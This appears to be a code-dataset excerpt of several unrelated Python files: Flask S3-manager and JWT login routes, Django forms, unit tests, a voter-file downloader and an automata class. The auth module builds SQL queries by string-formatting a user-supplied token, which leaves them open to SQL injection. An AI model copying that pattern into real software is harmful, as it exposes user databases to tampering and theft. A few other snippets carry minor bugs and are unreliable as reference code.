session["current_bucket"] = ""
session["page"] = 1
else:
logger.info('Login failed.')
return jsonify(buckets_list)
@DMC_APP.route('/logout', methods=["GET"])
def logout():
""" Function used to log out and clear user session.
:return: dictionary containing success status
"""
session.pop('logged_in', None)
session.clear()
logger.info('Logged out successfully.')
return jsonify({'success': True})
@DMC_APP.route("/bucket", methods=["GET", "POST"])
@login_required
def bucket_methods():
""" Function used to get list of buckets or create new bucket.
:return: dictionary containing success status and response or error message
"""
if request.method == "GET":
return jsonify(get_buckets())
else:
return jsonify(create_bucket(request))
@DMC_APP.route("/bucket/<bucket_name>", methods=["DELETE"])
@login_required
def delete_bucket(bucket_name):
""" Function used to delete a bucket.
:param bucket_name: bucket name
:return: dictionary containing success status and response or error message
"""
inputs_to_validate = {
'bucket_name': bucket_name
}
logger.debug("Delete Bucket: request parameters - {}".format(bucket_name))
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Delete bucket: {}'.format(response['message']))
return jsonify(response)
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
result = delete_objects_helper(bucket_name=bucket_name, client=s3_client)
if not result['success']:
return jsonify(result)
params = {
'bucket_name': bucket_name
}
response = s3_bucket_operations('delete_bucket', s3_client, params)
if response['success']:
session["current_bucket"] = ""
return jsonify(response)
@DMC_APP.route("/delete_objects", methods=["POST"])
@login_required
def delete_objects():
""" Function used to delete objects.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Delete Objects: request parameters - {}".format(request.json))
bucket_name = request.json.get('bucket')
objects = request.json.get('items')
inputs_to_validate = {
'bucket': bucket_name,
'items': objects
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Delete objects: {}'.format(response['message']))
return jsonify(response)
to_del_obj_list = []
prefix_list = []
for curr_object in objects:
if curr_object['type'] == 'file':
to_del_obj_list.append(dict(Key=curr_object['key']))
else:
prefix_list.append(curr_object['key'])
logger.debug("Delete Objects: files like objects - {}".format(to_del_obj_list))
if to_del_obj_list:
response = delete_objects_by_chunks(s3_client, to_del_obj_list, bucket_name)
if not response['success']:
return jsonify(response)
logger.debug("Delete Objects: folder like objects - {}".format(prefix_list))
for prefix in prefix_list:
result = delete_objects_helper(bucket_name=bucket_name, prefix=prefix, client=s3_client)
if not result['success']:
return jsonify(result)
return jsonify({'success': True, 'response': {}})
@DMC_APP.route("/list_objects", methods=["GET"])
@login_required
def list_objects():
""" Function used to get list of objects.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("List Objects: request parameters - {}".format(request.args))
bucket_name = request.args.get('bucketName')
page_size = request.args.get('page_size')
max_keys = request.args.get('marker_size')
inputs_to_validate = {
'bucketName': bucket_name,
'page_size': page_size,
'marker_size': max_keys
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('List objects: {}'.format(response['message']))
return jsonify(response)
breadcrumb_index = request.args.get('path_index', 0)
int_inputs_to_validate = {
'page_size': page_size,
'marker_size': max_keys,
'path_index': breadcrumb_index
}
response = validate_int_inputs(int_inputs_to_validate)
if not response['success']:
logger.error('List objects: {}'.format(response['message']))
return jsonify(response)
page_size = int(page_size)
max_keys = int(max_keys)
breadcrumb_index = int(breadcrumb_index)
marker = request.args.get('marker', "")
requested_marker = ""
prefix = request.args.get('prefix', '')
if session["current_bucket"] == "" or session["current_bucket"] != bucket_name \
or request.args.get('refresh_markers'):
session["current_bucket"] = bucket_name
session["pagination_markers"] = [{"key": bucket_name, "markers": [""]}]
session["pagination_markers"] = session["pagination_markers"][:(breadcrumb_index + 1)]
if prefix:
if not len(filter(lambda x: x['key'] == prefix, session["pagination_markers"])) == 1:
session["pagination_markers"].append(
{"key": prefix, "markers": [""]}
)
markers = session["pagination_markers"][breadcrumb_index]["markers"]
logger.debug("List Objects: markers before request - {}".format(markers))
response = {}
try:
if marker == "first":
markers = [""]
elif marker == "current":
markers.pop()
requested_marker = markers[-1]
elif marker == "next":
if not isinstance(markers[-1], bool):
requested_marker = markers[-1]
else:
requested_marker = markers[-2]
elif marker == "previous":
if len(markers) == 2:
markers = markers[:-1]
elif len(markers) > 2:
markers = markers[:-2]
requested_marker = markers[-1]
response = get_objects(s3_client, bucket_name, prefix, requested_marker, max_keys)
if not response['success']:
return jsonify(response)
else:
data = response['data']
data["page_offset"] = math.ceil((float(len(markers) - 1) * max_keys) / page_size)
data["page"] = len(markers)
markers.append(response['marker'])
logger.debug("List Objects: markers after request - {}".format(markers))
session["pagination_markers"][breadcrumb_index]["markers"] = markers
return jsonify({"success": True, "response": data})
except Exception as exception:
response.update({"success": False, "message": exception.message})
logger.exception('List objects: {}'.format(exception.message))
return jsonify(response)
@DMC_APP.route("/object", methods=["GET", "POST"])
@login_required
def object_methods():
""" Function used to create folder like object or get metadata of the object or cut/copy paste of objects.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
if request.method == 'POST':
action = request.json.get('action')
bucket_name = request.json.get('bucketName')
inputs_to_validate = {
'action': action
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Create folder: {}'.format(response['message']))
return jsonify(response)
if action == 'create_folder':
logger.debug("Create Folder: request parameters - {}".format(request.json))
name = request.json.get('name')
inputs_to_validate = {
'action': action,
'bucketName': bucket_name,
'name': name
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Create folder: {}'.format(response['message']))
return jsonify(response)
key_prefix = request.json.get('prefix')
if name != '/':
name = name + '/'
if key_prefix:
name = "{}{}".format(key_prefix, name)
response = check_key_existence(s3_client, bucket_name, name)
if not response['success']:
params = {
'bucket_name': bucket_name,
'body': '',
'key': name
}
response = s3_object_operations('create_folder', s3_client, params)
return jsonify(response)
else:
message = "Folder with the same name already exists. Please provide different name."
logger.error('Create folder: {}'.format(message))
return jsonify({"success": False, "message": message})
elif action == 'cut_copy_objects':
logger.debug("Paste Objects: request parameters - {}".format(request.json))
requested_objects = request.json.get('objects')
operation = request.json.get('operation')
overwrite = request.json.get('overwrite')
inputs_to_validate = {
'action': action,
'objects': requested_objects,
'bucketName': bucket_name,
'operation': operation,
'overwrite': overwrite
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('{} objects(s): {}'.format(operation.capitalize(), response['message']))
return jsonify(response)
key_prefix = request.json.get('prefix')
for obj in requested_objects:
name = "{}{}".format(key_prefix, obj['key']) if key_prefix else obj['key']
response = copy_objects(s3_client, obj['bucket'], bucket_name, obj['fullkey'],
name, obj['type'], overwrite)
if not response['success']:
return jsonify(response)
skip_keys = response['skipped_keys']
if operation == 'cut':
if obj['type'] == 'file' and obj['fullkey'] not in skip_keys:
response = delete_objects_by_chunks(s3_client, [{'Key': obj['fullkey']}], obj['bucket'])
else:
response = delete_objects_helper(bucket_name=obj['bucket'], prefix=obj['fullkey'],
client=s3_client, skip_keys=skip_keys)
if not response['success']:
return jsonify(response)
logger.info('{} objects(s) successfully completed.'.format(operation.capitalize()))
return jsonify({'success': True})
else:
logger.debug("Get Metadata: request parameters - {}".format(request.args))
bucket_name = request.args.get('bucket')
key = request.args.get('name')
inputs_to_validate = {
'bucket': bucket_name,
'name': key
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Head object: {}'.format(response['message']))
return jsonify(response)
params = {
'bucket_name': bucket_name,
'key': key
}
response = s3_object_operations('head_object', s3_client, params)
return jsonify(response)
@DMC_APP.route("/upload_file", methods=["POST"])
@login_required
def upload_file():
""" Function used to upload single file.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Upload File: request parameters - {}".format(request.form))
filename = request.form.get('filename')
bucket_name = request.form.get('bucketName')
file_to_upload = request.files.get('file')
inputs_to_validate = {
'filename': filename,
'bucketName': bucket_name,
'file': file_to_upload
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Upload file: {}'.format(response['message']))
return jsonify(response)
prefix = request.form.get('prefix')
if prefix:
filename = "{}{}".format(prefix, filename)
response = check_key_existence(s3_client, bucket_name, filename)
if not response['success']:
params = {
'bucket_name': bucket_name,
'file': file_to_upload,
'key': filename
}
response = s3_object_operations('upload_fileobj', s3_client, params)
return jsonify(response)
else:
message = "File with the same name already exists."
logger.error('Upload file: {}'.format(message))
return jsonify({"success": False, "message": message})
@DMC_APP.route("/create_multipart_upload", methods=["GET"])
@login_required
def create_multipart_upload():
""" Function used to initiate a multipart upload.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Create Multipart Upload: request parameters - {}".format(request.args))
filename = request.args.get('filename')
bucket_name = request.args.get('bucketName')
inputs_to_validate = {
'filename': filename,
'bucketName': bucket_name
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Create multipart upload: {}'.format(response['message']))
return jsonify(response)
prefix = request.args.get('prefix')
if prefix:
filename = "{}{}".format(prefix, filename)
response = check_key_existence(s3_client, bucket_name, filename)
if not response['success']:
params = {
'bucket_name': bucket_name,
'key': filename
}
response = s3_object_operations('create_multipart_upload', s3_client, params)
return jsonify(response)
else:
message = "File with the same name already exists."
logger.error('Create multipart upload: {}'.format(message))
return jsonify({"success": False, "message": message})
@DMC_APP.route("/upload_part", methods=["POST"])
@login_required
def upload_part():
""" Function used to upload a single part of a multipart upload.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Multipart Upload (Upload Part): request parameters - {}".format(request.form))
filesize = request.form.get('contentLength')
upload_id = request.form.get('uploadId')
part_num = int(request.form.get('partNumber'))
filename = request.form.get('filename')
bucket_name = request.form.get('bucketName')
inputs_to_validate = {
'contentLength': filesize,
'uploadId': upload_id,
'partNumber': part_num,
'filename': filename,
'bucketName': bucket_name
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Upload part: {}'.format(response['message']))
return jsonify(response)
int_inputs_to_validate = {
'partNumber': part_num
}
response = validate_int_inputs(int_inputs_to_validate)
if not response['success']:
logger.error('Upload part: {}'.format(response['message']))
return jsonify(response)
prefix = request.form.get('prefix')
if prefix:
filename = "{}{}".format(prefix, filename)
params = {
'bucket_name': bucket_name,
'key': filename,
'upload_id': upload_id,
'part_num': part_num,
'file': request.files['file']
}
response = s3_object_operations('upload_part', s3_client, params)
if not response['success']:
return jsonify(response)
return jsonify({'success': True, 'response': {"PartNumber": part_num, "ETag": response['response']["ETag"]}})
@DMC_APP.route("/complete_multipart_upload", methods=["POST"])
@login_required
def complete_multipart_upload():
""" Function used to complete a multipart upload.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Complete Multipart Upload: request parameters - {}".format(request.json))
upload_id = request.json.get('uploadId')
parts = request.json.get('parts')
filename = request.json.get('filename')
bucket_name = request.json.get('bucketName')
inputs_to_validate = {
'uploadId': upload_id,
'parts': parts,
'filename': filename,
'bucketName': bucket_name
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Complete multipart upload: {}'.format(response['message']))
return jsonify(response)
prefix = request.json.get('prefix')
if prefix:
filename = "{}{}".format(prefix, filename)
params = {
'bucket_name': bucket_name,
'key': filename,
'upload_id': upload_id,
'parts': {"Parts": parts}
}
response = s3_object_operations('complete_multipart_upload', s3_client, params)
return jsonify(response)
@DMC_APP.route("/cancel_multipart_upload", methods=["POST"])
@login_required
def cancel_multipart_upload():
""" Function used to cancel a multipart upload.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Cancel Multipart Upload: request parameters - {}".format(request.json))
upload_id = request.json.get('uploadId')
filename = request.json.get('filename')
bucket_name = request.json.get('bucketName')
inputs_to_validate = {
'uploadId': upload_id,
'filename': filename,
'bucketName': bucket_name
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Cancel multipart upload: {}'.format(response['message']))
return jsonify(response)
prefix = request.json.get('prefix')
if prefix:
filename = "{}{}".format(prefix, filename)
params = {
'bucket_name': bucket_name,
'key': filename,
'upload_id': upload_id
}
response = s3_object_operations('abort_multipart_upload', s3_client, params)
return jsonify(response)
@DMC_APP.route("/download", methods=["GET"])
@login_required
def download_objects():
""" Function used to download objects.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Download Files: request parameters - {}".format(request.args))
bucket_name = request.args.get('bucket')
objects = request.args.get('items')
inputs_to_validate = {
'bucket': bucket_name,
'items': objects
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Download files: {}'.format(response['message']))
return jsonify(response)
objects = json.loads(objects)
url_list = []
for curr_object in objects:
if curr_object['type'] == 'file':
params = {
'method': 'get_object',
'params': {'Bucket': bucket_name, 'Key': curr_object['key']},
'http_method': 'GET'
}
response = s3_object_operations('generate_presigned_url', s3_client, params)
else:
params = {
'Bucket': bucket_name,
'key': curr_object['key']
}
response = s3_object_operations('generate_folder_url', s3_client, params)
if not response['success']:
return jsonify(response)
url_list.append(response['response'])
return jsonify({'success': True, 'response': {'download_urls': url_list}})
@DMC_APP.route("/rename_object", methods=["POST"])
@login_required
def rename_object():
""" Function used to rename a object.
:return: dictionary containing success status and response or error message
"""
response, s3_client = get_s3_client()
if not response['success']:
return jsonify(response)
logger.debug("Rename Object: request parameters - {}".format(request.json))
bucket_name = request.json.get('bucketName')
old_key = request.json.get('old_key')
new_key = request.json.get('new_key')
object_type = request.json.get('type')
inputs_to_validate = {
'old_key': old_key,
'new_key': new_key,
'bucketName': bucket_name,
'type': object_type
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Rename Object: {}'.format(response['message']))
return jsonify(response)
prefix = request.json.get('prefix')
if prefix:
new_key = "{}{}".format(prefix, new_key)
if object_type == 'dir' and new_key[-1] != '/':
new_key = "{}/".format(new_key)
response = copy_objects(s3_client, bucket_name, bucket_name, old_key, new_key, object_type, False)
if not response['success']:
return jsonify(response)
elif response.get('key_exists'):
message = "Folder name already exists." if object_type == 'dir' else "File name already exists."
return jsonify({'success': False, 'message': message})
if object_type == 'dir':
response = delete_objects_helper(bucket_name=bucket_name, prefix=old_key, client=s3_client,
not_to_del_prefix=new_key)
if not response['success']:
return jsonify(response)
else:
response = delete_objects_by_chunks(s3_client, [{'Key': old_key}], bucket_name)
if not response['success']:
return jsonify(response)
logger.info('Renamed object successfully.')
return jsonify({'success': True})
def remove_old_downloads():
""" Function used to delete old downloaded folder's zip files in background.
"""
logger.debug('Scheduled task initiated')
while True:
try:
time.sleep(30)
for d in os.listdir(os.path.join(resource_path('downloads'))):
last_modified = int(os.path.getmtime(os.path.join(resource_path('downloads'), d)))
current_time = int(time.time())
if current_time >= last_modified + 60 * 60:
logger.debug('Deleting "{}"'.format(os.path.join(resource_path('downloads'), d)))
if os.path.isfile(os.path.join(resource_path('downloads'), d)):
os.remove(os.path.join(resource_path('downloads'), d))
else:
shutil.rmtree(os.path.join(resource_path('downloads'), d))
except Exception as e:
logger.exception('Scheduled task exited')
except KeyboardInterrupt:
pass
if __name__ == "__main__":
DMC_APP.run()
| StarcoderdataPython |
57820 | <reponame>le0park/search_scraper<filename>strategy/core.py<gh_stars>0
from abc import *
class AbstractScrapStrategy(metaclass=ABCMeta):
platform = 'etc'
driver = None
def __init__(self, driver):
self.driver = driver
@abstractmethod
def scraps(self, query, page_count):
return []
| StarcoderdataPython |
60613 | #!/usr/bin/env python
# coding=utf-8
import unittest
from app.domain.model import User, AnonymousUser, Permission, Role
class UserModelTestCase(unittest.TestCase):
def test_password_setter(self):
u = User(password = '<PASSWORD>')
self.assertTrue(u.password_hash is not None)
def test_no_password_getter(self):
u = User(password = '<PASSWORD>')
with self.assertRaises(AttributeError):
u.password
def test_password_verifcation(self):
u = User(password = '<PASSWORD>')
self.assertTrue(u.verify_password('<PASSWORD>'))
self.assertFalse(u.verify_password('<PASSWORD>'))
def test_password_salts_are_random(self):
u = User(password = '<PASSWORD>')
u2 = User(password = '<PASSWORD>')
self.assertTrue(u.password_hash != u2.password_hash)
def test_roles_and_permissions(self):
Role.insert_roles()
u = User(email='<EMAIL>', password="<PASSWORD>")
self.assertTrue(u.can(Permission.WRITE_ARTICLES))
self.assertFalse(u.can(Permission.MODERATE_COMMENTS))
def test_anonymous_user(self):
u = AnonymousUser()
self.assertFalse(u.can(Permission.FOLLOW))
| StarcoderdataPython |
1771182 | from datetime import date
from django import forms
class BuscaMixin(forms.Form):
ANOS_CHOICES = ()
MESES_CHOICES = (
('1', 'Janeiro'),
('2', 'Fevereiro'),
('3', 'Março'),
('4', 'Abril'),
('5', 'Maio'),
('6', 'Junho'),
('7', 'Julho'),
('8', 'Agosto'),
('9', 'Setembro'),
('10', 'Outubro'),
('11', 'Novembro'),
('12', 'Dezembro'),
)
def __init__(self, *args, **kwargs):
super(BuscaMixin, self).__init__(*args, **kwargs)
#Prepopular listagem de anos
for ano in range(2017, date.today().year + 2):
self.ANOS_CHOICES += (((str(ano), str(ano))),)
self.fields['ano'] = forms.ChoiceField(
label='Ano',
required=True,
choices=self.ANOS_CHOICES)
#Valores iniciais
self.initial['mes'] = date.today().month
self.initial['ano'] = date.today().year
mes = forms.ChoiceField(
label='Mês',
required=True,
choices=MESES_CHOICES,
)
class BuscaRelatorioForm(BuscaMixin):
def __init__(self, vinculos, *args, **kwargs):
super(BuscaRelatorioForm, self).__init__(*args, **kwargs)
#Popular listagem de vínculos
self.fields['bolsista'] = forms.ModelChoiceField(
required=False,
queryset=vinculos,
empty_label='Selecione o bolsista')
class BuscaRelatorioSetorForm(BuscaMixin):
def __init__(self, setores, *args, **kwargs):
super(BuscaRelatorioSetorForm, self).__init__(*args, **kwargs)
#Popular listagem de setores
self.fields['setor'] = forms.ModelChoiceField(
required=True,
queryset=setores,
empty_label='Selecione o setor') | StarcoderdataPython |
187343 | """
Downloads North Carolina voterfile and voter history, then extracts to data path.
"""
from io import BytesIO
from bs4 import BeautifulSoup
import os
import requests
import pandas as pd
from zipfile import ZipFile
from download_mggg import download_mggg_state
data_path = os.environ.get('DATA_PATH', '../data')
def download_zip(zip_url, filepath):
print('Making request ...........')
response = requests.get(zip_url)
zip_content = BytesIO(response.content)
with ZipFile(zip_content) as file:
print(f'Extracting file to {filepath}.....')
file.extractall(filepath)
return
def download_nc_voterfile_voterhistory(filepath):
ncvoter_statewide_url = \
'https://s3.amazonaws.com/dl.ncsbe.gov/data/ncvoter_Statewide.zip'
ncvhis_statewide_url = \
'https://s3.amazonaws.com/dl.ncsbe.gov/data/ncvhis_Statewide.zip'
download_zip(ncvoter_statewide_url, filepath)
download_zip(ncvhis_statewide_url, filepath)
def download_nc_precincts_elections(filepath):
"""Downloads Voter Tabulation District shapefiles and election data from github.com/mggg-states."""
nc_shapefile_url = 'https://github.com/mggg-states/NC-shapefiles/blob/master/NC_VTD.zip'
nc_shapefile_metadata_url = 'https://github.com/mggg-states/NC-shapefiles/blob/master/NC_VTD.zip'
download_zip(nc_shapefile_url, filepath)
if __name__ == '__main__':
download_nc_voterfile_voterhistory(f'{data_path}/voter-file')
| StarcoderdataPython |
1797947 | import os
import subprocess
from executors.pythonexecutor import PythonExecutor
def main():
codex = PythonExecutor()
codex.execute()
print(codex.log)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3238725 | <reponame>lipovsek/aimet<filename>TrainingExtensions/torch/test/python/test_graphmeta.py
# /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2020, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import os
import unittest
import pytest
from aimet_torch.meta.graphmeta import GraphMeta
INPUT_NODES = (
('rootmod', 'type0', 0),
('rootmod.submod1', 'type1', 0),
('rootmod.submod2', 'type2', 0),
('rootmod.submod1.leaf1', 'type3', 333),
('rootmod.submod2.leaf2', 'type4', 244),
('rootmod.submod2.leaf3', 'type3', 333),
)
INVOCATIONS = [
(INPUT_NODES[0][0], 0),
(INPUT_NODES[1][0], 0),
(INPUT_NODES[3][0], 200),
(INPUT_NODES[2][0], 0),
(INPUT_NODES[4][0], 300),
(INPUT_NODES[5][0], 200),
(INPUT_NODES[1][0], 0),
(INPUT_NODES[3][0], 200),
]
class TestTrainingExtensionsGraphMeta(unittest.TestCase):
def test_duplicate_node_name(self):
meta = self.create_test_meta()
full_name, namespc, name, typ, parms = self._split_test_node_attrs(INPUT_NODES[-1])
with pytest.raises(AssertionError):
meta.add_node(full_name, namespc, name, typ, parms)
def test_invalid_node_name(self):
meta = self.create_test_meta()
with pytest.raises(KeyError):
meta.get_node_stats('unknown_node')
def test_invalid_invocation(self):
meta = self.create_test_meta()
with pytest.raises(KeyError):
meta.add_invocation('unknown_node', macs=0)
def test_valid_meta(self):
model_name = 'SimpleModel'
meta = self.create_test_meta(model_name)
assert meta.model_name == model_name
assert meta.num_nodes == len(INPUT_NODES)
node_names = list(meta.yield_node_names())
assert len(node_names) == len(INPUT_NODES)
for idx in range(len(INPUT_NODES)):
assert node_names[idx] == INPUT_NODES[idx][0]
stats_by_type = meta.get_stats_by_type()
assert len(stats_by_type) == len(set(node[1] for node in INPUT_NODES))
assert sum(stats['nodes'] for stats in stats_by_type.values()) == len(INPUT_NODES)
assert sum(stats['parms'] for stats in stats_by_type.values()) == meta.num_parameters
assert meta.num_invocations == len(INVOCATIONS)
invocations = list(meta.yield_node_names_invoked(no_dups=False))
assert len(invocations) == len(INVOCATIONS)
invocations = list(meta.yield_node_names_invoked(no_dups=True))
assert len(invocations) == len(set(entry[0] for entry in INPUT_NODES))
stats_by_type = meta.get_stats_by_type()
assert len(stats_by_type) == len(set(entry[1] for entry in INPUT_NODES))
assert sum(stats['uses'] for stats in stats_by_type.values()) == len(INVOCATIONS)
assert sum(stats['macs'] for stats in stats_by_type.values()) == \
sum(entry[1] for entry in INVOCATIONS)
sum_parms_static = 0
sum_uses = 0
sum_parms_dyn = 0
sum_macs = 0
for node_name in invocations: # used 'no_dups' so result holds unique nodes
stats = meta.get_node_stats(node_name)
parms_static, uses, macs = stats['parms'], stats['uses'], stats['macs']
sum_parms_static += parms_static
sum_uses += uses
sum_parms_dyn += uses * parms_static
sum_macs += macs
assert sum_parms_static == sum(entry[2] for entry in INPUT_NODES)
assert sum_parms_static == meta.num_parameters
assert sum_uses == len(INVOCATIONS)
assert sum_parms_dyn == sum_parms_static + INPUT_NODES[-1][2]
assert sum_macs == sum(entry[1] for entry in INVOCATIONS)
assert sum_macs == meta.num_macs
def test_data_to_dump(self):
meta = self.create_test_meta()
num_parms, num_invocations, num_macs, type_lines = meta._gather_data_to_dump()
assert num_parms == meta.num_parameters
assert num_invocations == len(INVOCATIONS)
assert num_macs == meta.num_macs
assert len(type_lines) == len(set(node[1] for node in INPUT_NODES))
@classmethod
def create_test_meta(cls, model_name='TestModel', data=None):
meta = GraphMeta(model_name)
if not data:
data = INPUT_NODES
for node in data:
full_name, namespc, name, typ, parms_static = \
cls._split_test_node_attrs(node, prefix=model_name)
meta.add_node(full_name, namespc, name, typ, parms_static)
for inv in INVOCATIONS:
meta.add_invocation(inv[0], inv[1])
return meta
@staticmethod
def _split_test_node_attrs(node, prefix=''):
full_name, typ, parms = node
namespc, name = os.path.splitext(full_name)
if name:
name = name[1:] # skip period char
else:
namespc, name = prefix, namespc
return full_name, namespc, name, typ, parms
| StarcoderdataPython |
120834 | <reponame>abadojack/StackOverflow-lite
import json
import re
import uuid
from datetime import datetime, timedelta
import jwt
import psycopg2
from flask import jsonify, request
from validate_email import validate_email
from werkzeug.security import check_password_hash
from project.config import Config
from project.database import conn
from project.models.models import User
from . import users
try:
cur = conn.cursor()
cur.execute("ROLLBACK")
conn.commit()
except Exception as e:
print('connection exception ', e)
cur = conn.cursor()
cur.execute("ROLLBACK")
def auth_encode(user_id):
"""Generate auth token"""
try:
payload = {
'exp': datetime.now() + timedelta(hours=1),
'iat': datetime.now(),
'sub': user_id
}
return jwt.encode(
payload,
Config.SECRET
)
except Exception as ex:
raise ex
def auth_decode(token):
"""Decode auth token"""
try:
payload = jwt.decode(token, Config.SECRET)
return payload['sub']
except Exception as e:
print('auth_token error', e)
return None
def insert_token(token):
"""change the status of a request"""
query = "INSERT INTO tokens (id, expired_tokens) VALUES ('%s','%s');" % (uuid.uuid4(), token)
cur.execute(query)
conn.commit()
def get_token(token):
"""get token from db"""
cur.execute("SELECT expired_tokens FROM tokens WHERE expired_tokens = '%s';" % token)
token = cur.fetchone()
return token
def get_user_id():
""" get user_id from token"""
token = request.headers.get('token', None)
return auth_decode(token)
@users.route('/auth/signup', methods=['POST'])
def signup():
"""sign up a new user"""
try:
username = json.loads(request.data.decode())['username']
password = json.loads(request.data.decode())['password'].replace(" ", "")
email = json.loads(request.data.decode())['email'].replace(" ", "")
if re.match('^[a-zA-Z][-\w.]{0,22}([a-zA-Z\d]|(?<![-.])_)$', username) is None:
return jsonify({'response': 'invalid username'}), 400
if not validate_email(email):
return jsonify({'response': 'invalid email'}), 400
if re.match('[A-Za-z0-9@#$%^&+=]{8,}', password) is None:
return jsonify({'response': 'password must contain 6 or more characters'}), 400
"""
search if the user exists in the database
"""
user = User(username, email, "")
if user.exists() is None:
user.create_user(password)
return jsonify({'response': 'user created successfully'}), 201
else:
return jsonify({'response': 'user already exists'}), 409
except (KeyError, ValueError) as ex:
print('response', ex)
return jsonify({'response': 'json body must contain username, password and email'}), 400
except (psycopg2.DatabaseError, psycopg2.IntegrityError, Exception) as ex:
print('error in signup', ex)
return jsonify({'response': 'something went wrong'}), 500
@users.route('/auth/login', methods=['POST'])
def login():
"""
login an existing user
"""
try:
username = json.loads(request.data.decode())['username'].replace(" ", "")
password = json.loads(request.data.decode())['password'].replace(" ", "")
user = User(username, "", "")
user = user.exists()
if check_password_hash(user.password_hash, password):
"""token if password is correct"""
token = auth_encode(user.user_id)
if token:
response = {'response': 'login successful', 'token': token.decode()}
return jsonify(response), 200
else:
return jsonify({'response': 'invalid username/password'}), 422
except (KeyError, ValueError) as ex:
print('error in login', ex)
return jsonify({'response': 'json body must contain username and password'}), 400
except (psycopg2.DatabaseError, psycopg2.IntegrityError, Exception) as ex:
print('error in login', ex)
return jsonify({'response': 'user not found'}), 404
@users.route('/auth/signout', methods=['POST'])
def signout():
"""sign out user """
try:
token = request.headers.get('token')
# insert token to expired db
if get_token(token) is None:
insert_token(token)
return jsonify({'response': 'signed out'}), 200
else:
return jsonify({'response': 'Invalid token'}), 401
except Exception as ex:
print('response', ex)
return jsonify({'response': 'something went wrong'}), 500
| StarcoderdataPython |
147414 | """
This module contains the structs necessary to represent an automata.
"""
from __future__ import annotations
import logging
from typing import Any, Dict, Iterable, List, Set, Tuple, Union
from numlab.automata.state import State
from numlab.automata.transition import Transition
_ATMT_COUNT = 0
class Automata:
"""
An automata.
Parameters
----------
name : str
The name of the automata.
Attributes
----------
name : str
The name of the automata.
states : Dict[str, State]
The states of the automata.
start_states : List[State]
The start states of the automata.
end_states : List[State]
The end states of the automata.
"""
def __init__(self, name: str = None) -> None:
if name is None:
global _ATMT_COUNT
name = f"atmt_{_ATMT_COUNT}"
_ATMT_COUNT += 1
self.name = name
self.states: Dict[str, State] = {}
self.start_states: List[State] = []
self.end_states: List[State] = []
self._pos = 0
self._input = None
self._current_state: State = None
self._processes: List[Tuple[State, int]] = []
self._processes_idx: int = 0
def __getattr__(self, item: str) -> Any:
if item in self.states:
return self.states[item]
raise AttributeError(f"No attribute {item}")
@property
def alphabet(self) -> Set[Tuple[Any, bool]]:
"""
Get the alphabet of the automata.
Returns
-------
List[Any]
The alphabet of the automata.
"""
alphabet = set()
for state in self.states.values():
for transition in state.transitions:
if transition.is_epsilon:
continue
if isinstance(transition.condition, str):
alphabet.add(transition.condition)
else:
alphabet.update(transition.condition)
return alphabet
def concatenate(self, other: Automata, set_single: bool = False) -> Automata:
"""
Concatenate the automata with another one.
Parameters
----------
other : Automata
The other automata.
set_single : bool, optional
Whether to set the automata to have a single start and end state
